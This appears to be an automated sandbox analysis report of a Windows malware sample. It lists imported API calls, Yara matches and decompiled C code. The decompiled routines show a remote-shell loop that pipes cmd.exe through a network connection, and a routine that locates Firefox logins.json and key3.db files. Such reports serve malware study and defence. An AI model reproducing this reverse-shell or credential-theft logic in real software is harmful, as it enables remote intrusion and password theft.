                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                                                                • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00402B8A(char _a4) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v7;
                                                                                				char _v8;
                                                                                				char _v9;
                                                                                				void _v16;
                                                                                				signed int _v20;
                                                                                				long _v24;
                                                                                				long _v28;
                                                                                				void* _v44;
                                                                                				char _v60;
                                                                                				char _v76;
                                                                                				char* _t54;
                                                                                				int _t68;
                                                                                				void* _t79;
                                                                                				CHAR* _t80;
                                                                                				int _t91;
                                                                                				signed int _t120;
                                                                                				void* _t136;
                                                                                				CHAR* _t142;
                                                                                				void* _t146;
                                                                                
                                                                                				if(( *0x41b85c & 0x00000001) != 0) {
                                                                                					_t142 = 0;
                                                                                				} else {
                                                                                					 *0x41b85c =  *0x41b85c | 0x00000001;
                                                                                					_t142 = 0;
                                                                                					E00402010(0x41b800, 0);
                                                                                					E00413E72(0x402f89);
                                                                                				}
                                                                                				if(( *0x41b85c & 0x00000002) == 0) {
                                                                                					 *0x41b85c =  *0x41b85c | 0x00000002;
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
                                                                                					E00413E72(0x402f7e);
                                                                                				}
                                                                                				_t50 =  &_v5;
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z(_t50);
                                                                                				_v20 = _v20 | 0xffffffff;
                                                                                				_v16 = _t142;
                                                                                				if( *0x41b888 != 0) {
                                                                                					L12:
                                                                                					_v24 = _t142;
                                                                                					PeekNamedPipe( *0x41b858, _t142, _t142, _t142,  &_v24, _t142);
                                                                                					if(_v24 <= _t142) {
                                                                                						_t146 = _t146 - 0x10;
                                                                                						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v9);
                                                                                						_t54 = E004020C2(0x41b800, 0x62, 0x415664);
                                                                                						_v20 = _t54;
                                                                                					} else {
                                                                                						_t136 = malloc(_v24);
                                                                                						_t54 = ReadFile( *0x41b858, _t136, _v24,  &_v28, _t142);
                                                                                						if(_v28 > _t142) {
                                                                                							if(_v16 <= _t142) {
                                                                                								L18:
                                                                                								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v7);
                                                                                								_t146 = _t146 - 0x10;
                                                                                								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_t142, _v28,  &_v8);
                                                                                								_t54 = E004020C2(0x41b800, 0x62,  &_v76);
                                                                                								_v20 = _t54;
                                                                                							} else {
                                                                                								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                								_t68 = strncmp(_t136, _t54, _v16);
                                                                                								_t146 = _t146 + 0xc;
                                                                                								if(_t68 != 0) {
                                                                                									goto L18;
                                                                                								} else {
                                                                                									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t136,  &_v5);
                                                                                									_t146 = _t146 - 0x10;
                                                                                									__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z(_v16, _v28 - _v16,  &_v6);
                                                                                									_t54 = E004020C2(0x41b800, 0x62,  &_v60);
                                                                                									_v20 = _t54;
                                                                                								}
                                                                                							}
                                                                                							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						}
                                                                                						free(_t136);
                                                                                					}
                                                                                					goto L22;
                                                                                				} else {
                                                                                					__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(0x41b860, "cmd.exe");
                                                                                					if(_t50 == 0) {
                                                                                						L11:
                                                                                						if( *0x41b888 != 0) {
                                                                                							do {
                                                                                								goto L12;
                                                                                								L22:
                                                                                								if(_v20 == 0xffffffff) {
                                                                                									 *0x41b889 =  *0x41b889 & 0x00000000;
                                                                                								}
                                                                                								__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                								if(_t54 <= 0) {
                                                                                									_v16 = _t142;
                                                                                								} else {
                                                                                									__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415770);
                                                                                									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(0x41b860);
                                                                                									__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                                                                									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                									WriteFile( *0x41b870,  &_v16,  &_v16,  &_v16, _t142);
                                                                                									__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
                                                                                								}
                                                                                								Sleep(0x64);
                                                                                							} while ( *0x41b889 != 0);
                                                                                							TerminateProcess(0x41b878->hProcess, _t142);
                                                                                							CloseHandle( *0x41b87c);
                                                                                							_t50 = CloseHandle( *0x41b878);
                                                                                						}
                                                                                						E004020F4(_t50, 0x41b800);
                                                                                						CloseHandle( *0x41b858);
                                                                                						CloseHandle( *0x41b874);
                                                                                						 *0x41b888 =  *0x41b888 & 0x00000000;
                                                                                						_t91 = 1;
                                                                                					} else {
                                                                                						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(getenv("SystemDrive"));
                                                                                						__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415774);
                                                                                						0x41b7f0->nLength = 0xc;
                                                                                						 *0x41b7f8 = 1;
                                                                                						 *0x41b7f4 = _t142;
                                                                                						if(CreatePipe(0x41b7a0, 0x41b870, 0x41b7f0, _t142) == 0 || CreatePipe(0x41b858, 0x41b874, 0x41b7f0, _t142) == 0) {
                                                                                							_t91 = 0;
                                                                                						} else {
                                                                                							_t120 = 0x11;
                                                                                							memset(0x41b7a8, 0, _t120 << 2);
                                                                                							_t79 =  *0x41b7a0; // 0x0
                                                                                							 *0x41b7e0 = _t79;
                                                                                							_t80 =  *0x41b874; // 0x0
                                                                                							0x41b7a8->cb = 0x44;
                                                                                							 *0x41b7d4 = 0x101;
                                                                                							 *0x41b7d8 = _t142;
                                                                                							 *0x41b7e4 = _t80;
                                                                                							 *0x41b7e8 = _t80;
                                                                                							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                							 *0x41b888 = CreateProcessA(_t142, _t80, _t142, _t142, 1, _t142, _t142, _t80, 0x41b7a8, 0x41b878) & 0xffffff00 | _t81 != 0x00000000;
                                                                                							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z();
                                                                                							 *0x41b889 = 1;
                                                                                							E00402038(0x41b800);
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							asm("movsd");
                                                                                							E0040209B(0x41b800, 0x415664);
                                                                                							_t146 = _t146 + 0xc;
                                                                                							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                                                                							_v20 = E004020C2(0x41b800, 0x93,  &_a4);
                                                                                							Sleep(0x12c);
                                                                                							_t142 = 0;
                                                                                							goto L11;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                				return _t91;
                                                                                			}


                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                                                                • getenv.MSVCRT ref: 00402C34
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                                                                • CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                                                                • CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                                                                • CreateProcessA.KERNEL32(00000000,00000000), ref: 00402D0E
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402D25
                                                                                  • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                                                                  • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                                                                • Sleep.KERNEL32(0000012C,00000093), ref: 00402D71
                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402D97
                                                                                • malloc.MSVCRT ref: 00402DA9
                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00402DC1
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402DDB
                                                                                • strncmp.MSVCRT(00000000,00000000), ref: 00402DE3
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402DF8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?), ref: 00402E15
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?), ref: 00402E3B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@IIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?), ref: 00402E52
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000062), ref: 00402E67
                                                                                • free.MSVCRT(00000000), ref: 00402E6E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00402E85
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402D57
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000062), ref: 00402EAB
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415770), ref: 00402EBC
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0041B860), ref: 00402ECA
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00402ED7
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402EE0
                                                                                • WriteFile.KERNEL32(00000000), ref: 00402EED
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00402EFA
                                                                                • Sleep.KERNEL32(00000064), ref: 00402F07
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00402F21
                                                                                • CloseHandle.KERNEL32 ref: 00402F33
                                                                                • CloseHandle.KERNEL32 ref: 00402F3B
                                                                                • CloseHandle.KERNEL32 ref: 00402F52
                                                                                • CloseHandle.KERNEL32 ref: 00402F5A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F71
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@$D@1@@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseHandle$CreatePipeV01@@$?length@?$basic_string@FileProcessSleepY?$basic_string@$??8std@@D@2@@0@NamedPeekReadTerminateV?$basic_string@Writeconnectfreegetenvmallocstrncmp
                                                                                • String ID: SystemDrive$cmd.exe
                                                                                • API String ID: 1882443052-3633465311
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                                                                • getenv.MSVCRT ref: 004072D9
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                                                                  • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                                                                  • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
